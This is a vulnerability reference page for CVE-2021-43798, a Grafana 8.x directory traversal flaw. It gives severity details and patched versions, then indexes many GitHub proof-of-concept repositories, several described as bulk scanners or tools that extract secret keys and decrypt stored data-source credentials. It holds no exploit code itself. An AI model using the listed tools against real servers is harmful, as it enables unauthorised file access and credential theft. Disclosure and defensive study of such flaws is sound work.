CVE-2021-43798
Description
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: \<grafana_host_url\>/public/plugins//
, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
Severity: HIGH
CVE ID: CVE-2021-43798
CVSS Score: 7.5
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Proof Of Concept
Nuclei Templates for CVE-2021-43798
Refrence: Project Discovery GitHub
taythebot
CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)
Refrence: GitHub
zer0yu
Grafana Arbitrary File Reading Vulnerability
Refrence: GitHub
jas502n
Grafana Unauthorized arbitrary file reading vulnerability
Refrence: GitHub
ScorpionsMAX
CVE-2021-43798 Grafana 任意文件读取漏洞 POC+参数
Refrence: GitHub
Mr-xn
CVE-2021-43798:Grafana 任意文件读取漏洞
Refrence: GitHub
asaotomo
Grafanav8.*版本任意文件读取漏洞批量检测工具:该漏洞目前为0day漏洞,未授权的攻击者利用该漏洞,能够获取服务器敏感文件。
Refrence: GitHub
A-D-Team
A exploit tool for Grafana Unauthorized arbitrary file reading vulnerability (CVE-2021-43798), it can burst plugins / extract secret_key / decrypt data_source info automatic.
Refrence: GitHub
kenuosec
利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。
Refrence: GitHub
M0ge
grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL
Refrence: GitHub
JiuBanSec
Grafana File-Read Vuln
Refrence: GitHub
lfz97
CVE-2021-43798-Grafana任意文件读取漏洞
Refrence: GitHub
s1gh
Refrence: GitHub
z3n70
Simple program for exploit grafana
Refrence: GitHub
Mo0ns
Grafana-POC任意文件读取漏洞(CVE-2021-43798)
Refrence: GitHub
fanygit
CVE-2021-43798Exp多线程批量验证脚本
Refrence: GitHub
LongWayHomie
CVE-2021-43798 is a vulnerability marked as High priority (CVSS 7.5) leading to arbitrary file read via installed plugins in Grafana application.
Refrence: GitHub
pedrohavay
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).
Refrence: GitHub
gixxyboy
Refrence: GitHub
Ryze-T
Grafana8.x 任意文件读取
Refrence: GitHub
k3rwin
CVE-2021-43798 Grafana任意文件读取
Refrence: GitHub
gps1949
Refrence: GitHub
halencarjunior
Refrence: GitHub
light-Life
运用golang写的grafana批量验证脚本,内置48个验证
Refrence: GitHub
rnsss
Grafana8.x 任意文件读取
Refrence: GitHub
rodpwn
Refrence: GitHub
aymenbouferroum
Refrence: GitHub
Jroo1053
Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798).
Refrence: GitHub
yasindce1998
This repository contains files for reproducing the vulnerability.
Refrence: GitHub
BJLIYANLIANG
Refrence: GitHub
lalkaltest
Refrence: GitHub
hupe1980
Grafana - Directory Traversal and Arbitrary File Read
Refrence: GitHub
G01d3nW01f
Refrence: GitHub
mauricelambert
This script implements a lab automation where I exploit CVE-2021-43798 to steal user secrets and then gain privileges on a Linux system.
Refrence: GitHub
FAOG99
Exploit for grafana CVE-2021-43798
Refrence: GitHub
nuker
POC for CVE-2021-43798 written in python
Refrence: GitHub
victorhorowitz
Refrence: GitHub
katseyres2
Refrence: GitHub
Iris288
Refrence: GitHub
wagneralves
Directory Traversal and Arbitrary File Read on Grafana
Refrence: GitHub
K3ysTr0K3R
A PoC exploit for CVE-2021-43798 - Grafana Directory Traversal
Refrence: GitHub
ticofookfook
Refrence: GitHub
topyagyuu
Refrence: GitHub